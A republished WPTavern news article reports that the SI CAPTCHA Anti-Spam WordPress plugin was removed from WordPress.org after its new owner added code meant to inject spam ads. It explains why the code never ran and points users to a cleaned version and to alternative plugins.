+44 0330 223 3428
Call Us
+44 0330 223 3428

WPTavern: SI CAPTCHA Anti-Spam Plugin Permanently Removed from WordPress.org Due to Spam Code

WPTavern: SI CAPTCHA Anti-Spam Plugin Permanently Removed from WordPress.org Due to Spam Code

The SI CAPTCHA Anti-Spam plugin has been removed from the WordPress Directory due to its author including spam code. The plugin added a CAPTCHA image test to WordPress forms to prevent spam and was compatible with forms generated by bbPress, BuddyPress, Jetpack, and WooCommerce. It had more than 300,000 active installs at the time of removal.

Mike Challis, the original author of the plugin, said that a WordPress.org user named “fastsecure” became the new owner of SI CAPTCHA Anti-Spam in June 2017. Challis was not aware of the new owner’s plans for the plugin but posted a notice on the WordPress.org support forums to inform users about why it was removed.

“The new owner attempted to put code in several of his newly acquired WordPress plugins that would connect to a 3rd party server he also owned and place spam ads for payday loans and such in the WP posts,” Challis said. He also linked the incident to a ring of WordPress plugins that researchers at Wordfence say were part of a coordinated spam campaign. Display Widgets, one of the most notable plugins in this group, was recently permanently removed from WordPress.org for a series of violations wherein the author had injected malicious code.

Challis said the new owner failed to display any spam on sites due to how the code was implemented, but the code could have been activated at a later time:

The new owner put spam code in versions 3.0.1 and 3.0.2 but it failed to display any spam because he put the code in the secureimage.php file. The malicious code required WordPress libraries to also be loaded to execute. The reason the spam code did not do anything at all is because the secureimage.php file is not included in the WordPress run time environment. The secureimage.php file is included from another file securimage_show.php that loads the captcha image directly from html img src outside of the WordPress run time. The spam code in this plugin was never activated, it would not have corrupted your posts or changed anything in the WordPress database.

SI CAPTCHA Anti-Spam users who still have the plugin installed may see an update available in the WordPress admin. Plugin team member Samuel (Otto) Wood removed the malicious code and released 3.0.3 as a clean version that is a safe update for users who still rely on the plugin. Wood recommends users find an alternative, because SI CAPTCHA Anti-Spam will not be re-listed in the directory or receive any future updates.

The incident is another reminder for users to be on alert when WordPress.org plugins change hands, as the buyers do not always disclose their actual intentions for the plugin. Users in search of an alternative to SI CAPTCHA Anti-Spam will find many alternative options on WordPress.org. AntiSpam by CleanTalk, Simple Google reCAPTCHA, and CAPTCHA Code are a few examples that may work as replacements, depending on what other plugins you need the anti-spam capabilities to support.



Source: WordPress

Related Post
Post Status: Why the makers of Ninja Forms are getting into eCommerce

Post Status: Why the makers of Ninja Forms are getting into eCommerce Welcome to the Post Status Draft podcast, which you can find on iTunes, Google Play, Stitcher, and via RSS for your favorite podcatcher. Post Status Draft is hosted by Brian Krogsgard and co-host Brian Richards. In this episode, I bring on James Laws […]

Read more
WPTavern: WordPress 4.9.8 Will Significantly Reduce Memory Leak

WPTavern: WordPress 4.9.8 Will Significantly Reduce Memory Leak WordPress 4.9.8 Beta two recently shipped and although much of the focus will be on the “Try Gutenberg” call-out, there’s a patch included that addresses a memory leak that was quite a problem for some users. When WordPress 4.9.7 shipped, the WordPress.org support forums saw an increase in […]

Read more
Donncha: WP Super Cache and Cookie Banners

Donncha: WP Super Cache and Cookie Banners More sites use cookie banners now that the GDPR is active but some are finding that their banners are misbehaving once they enable caching. This is a similar issue to the one that happened to some page counter plugins in the past. The page counter wouldn’t increment. When […]

Read more